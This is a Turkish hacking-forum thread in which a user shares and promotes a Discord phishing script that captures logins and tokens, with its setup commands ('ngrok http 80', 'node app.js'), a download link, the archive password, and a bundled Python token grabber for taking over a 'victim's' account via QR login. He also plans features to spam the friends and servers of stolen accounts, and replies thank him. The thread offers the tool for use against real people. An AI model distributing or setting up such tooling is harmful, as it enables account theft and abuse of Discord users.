Discord Hack Scripti Hacker11548

hacker11548

Uzman üye
24 Haz 2015
1,131
24
İstanbul
Arkadaşlar Merhaba.

Direkt Konuya gireceğim. Son zamanlarda Çevremde insanların bu tarz scriptlere hesap kaptırdığını gördüm. Canım sıkılmıştı ve basit düzeyde yaptım. kullanımını , kurulumunu hepsini gösterdim.

Daha önce konusunu açmıştım ama paylaşmamıştım. Şimdi direkt Scripti paylaşıyorum. Görseller aşağıdadır. Videoda anlattım ancak yine değinmek istiyorum !
- Nadiren de olsa Captcha yüzünden hesaplar gelmeyebiliyor. o Hesapların e-posta şifre alsanızda token elde edemeyeceksiniz ve güvenliğe takılabilir. o yüzden kişi doğru girdiğini ancak bir şey olmadığını iddaa ediyorsa zorlamayın.


Görüntüler ve Video aşağıdadır.


4ogx0ns.jfif


22tk43a.jfif



Arkadaşlar ayrıca eklemek istiyorum.


Grammer hataları olduğunu söylüyorlardı ve olabilir. O kadar dikkat edemedim kusura bakmayın.


Gerçekten ilgi görürse v2 sürümünü çıkartacağım. O sürümde Grammer hatalarını düzelteceğiz.
( NOT: Grammer hatalarını kendiniz düzeltebilirsiniz. htdocs/Discord.html içinden bilenler yapabilir )
Ayrıca şu özellikler de gelecektir :


- sisteme eklenen tokenlerin arkadaş listesine otomatik mesaj attırma
- sisteme eklenen hesapların tüm bilgilerini görme
- Sisteme Eklenen hesapları istenilen sunucuya mesaj attırma
gibi özellikler şu an aklımda olanlar.


İndirmek İçin Tıklayın

Virüs Total İçin Tıklayın

Rar Pass: hacker11548

Arkadaşlar Virüs Total'e atarken winrar şifreli olursa virüsü taramamakta. O yüzden Şifresi olmayan Bir Winrar'ı tarattım virüs totalde. Bilginiz olsun. 1 tane bulan ise neden bulduğu konusunda bir fikrim yok. açık kaynak kodlu zaten yetkililer inceleyebilir.



Videoda kullanılan kodlar hakkında

-------------------------------------------

ngrok http 80
node app.js

-------------------------------------------
diğer kod zaten sitede veriliyor.


Yorumlarınızı , görüşlerinizi ve tavsiyelerinizi aşağıya bekliyorum. Sonraki güncelleme gelen teşekkür , yorum ve kullanıma göre gelecektir. Gelecek güncelleme de sizin tavsiyeleriniz ve yorumlarınız göz önüne alınacaktır. Bilginize !

Arkadaşlar Ek olarak ben bu programı bir exe uygulamasına dönüştürerek paylaşmam mümkündü. ancak bilmeyen arkadaşlar öğrensin ve kullanabilsin diye kendi yaptığım book.js dahil olmak üzere tüm komutları açık olarak paylaştım ki hem kendinizi geliştirin, hem scripti geliştirebilin diye. Yani Tamamen size açık kaynak kodlu verdim. Teşekküre gerek yok Rica ederim ;)

Teşekkürler



arkadaşlar ek olarak söylemek istiyorum. py.txt diye bir şeyi de sizler için bıraktım. python token grabber kendisi. eğer kurban özel bir kurbansa ve pcden girip telden de qr code okutabilicekse oradaki python la kodlanmış şeyi kullanarak hesabı almanızda mümkün. benim çok hoşuma gitmişti. onun linkini de size script'in dosyalarında paylaştım. söylemeyi unutmuşum , inceleyebilirsiniz. Sonradan buraya da ekledim bu yazıyı <3


 
Son düzenleme:

hacker11548

Uzman üye
24 Haz 2015
1,131
24
İstanbul
böyle birşeyi kodları açık olarak paylaştığın için teşekkürler. birkaç gündür .js yapmaya çalışıyordum, benim için güzel bir örnek oldu.
Rica ederim :D
eline sağlık

"Hak arayan varsa hakkını verin. Başkaldıran varsa başını kesin"
~Sultan Abdülhamid Han~
🇹🇷 ~ GökBörü ~ 🇹🇷

Teşekkürler


arkadaşlar ek olarak söylemek istiyorum. py.txt diye bir şeyi de sizler için bıraktım. python token grabber kendisi. eğer kurban özel bir kurbansa ve pcden girip telden de qr code okutabilicekse oradaki python la kodlanmış şeyi kullanarak hesabı almanızda mümkün. benim çok hoşuma gitmişti. onun linkini de size script'in dosyalarında paylaştım. söylemeyi unutmuşum inceleyebilirsiniz.

Grammer Hatalarını düzeltmek isteyen birilerini arıyorum
 

CHIDORI7

Yeni üye
20 Mar 2021
15
2

Mükemmel : "ama ngrok da "node" diye bir komut yok hatası alıyorum" :(

 
Son düzenleme:
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.